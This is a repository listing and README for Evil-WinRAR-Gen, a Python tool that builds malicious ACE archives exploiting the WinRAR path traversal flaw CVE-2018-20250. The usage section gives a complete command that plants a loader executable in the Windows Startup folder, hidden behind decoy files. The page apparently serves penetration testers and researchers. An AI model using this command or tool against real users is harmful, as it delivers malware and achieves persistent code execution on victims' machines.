https://github.com/manulqwerty/Evil-WinRAR-Gen
Generator of malicious Ace files for WinRAR < 5.70 beta 1
https://github.com/manulqwerty/Evil-WinRAR-Gen
Last synced: 4 months ago
JSON representation
Generator of malicious Ace files for WinRAR < 5.70 beta 1
- Host: GitHub
- URL: https://github.com/manulqwerty/Evil-WinRAR-Gen
- Owner: manulqwerty
- License: gpl-3.0
- Created: 2019-02-26T17:51:29.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2019-07-26T18:17:29.000Z (over 6 years ago)
- Last Synced: 2024-11-21T15:39:36.499Z (12 months ago)
- Language: Python
- Size: 21.5 KB
- Stars: 123
- Watchers: 3
- Forks: 28
- Open Issues: 4
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - manulqwerty/Evil-WinRAR-Gen - Generator of malicious Ace files for WinRAR < 5.70 beta 1 (Python)
README
# Evil-WinRAR-Generator
[](https://www.python.org/downloads/release/python-360/)
[](https://raw.githubusercontent.com/master/LICENSE) [](https://twitter.com/manulqwerty)
Generator of malicious Ace files for WinRAR < 5.70 beta 1
Vulnerability by [research.checkpoint.com](https://research.checkpoint.com/extracting-code-execution-from-winrar/)
**Developed by [@manulqwerty - IronHackers](https://ironhackers.es).**
Usage
----
Help:
`./evilWinRAR.py -h`
Generate a malicius archive:
> Rar filename: evil.rar
> Evil path: C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
> Evil files: calc.exe , l04d3r.exe
> Good files: hello.txt , cats.jpeg
```bash
./evilWinRAR.py -o evil.rar -e calc.exe l04d3r.exe -g hello.txt cats.jpeg -p 'C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
```
Instalation
----
You can download Evil-WinRAR-Generator by cloning the [Git](https://github.com/manulqwerty/Evil-WinRAR-Gen.git) repository:
```bash
git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen && pip3 install -r requirements.txt
chmod +x evilWinRAR.py
```
Evil-WinRAR-Generator works out of the box with [Python](http://www.python.org/download/) version **3.x** on any platform.
Proof of Concept (CVE-2018-20250)
----
[](https://www.youtube.com/watch?v=eUsVHa_fxrA)
Screenshots
----


Credits
----
https://github.com/droe/acefile
https://github.com/WyAtu/CVE-2018-20250
**Colaborators:**
[cybervaca]
[cybervaca]: https://github.com/cybervaca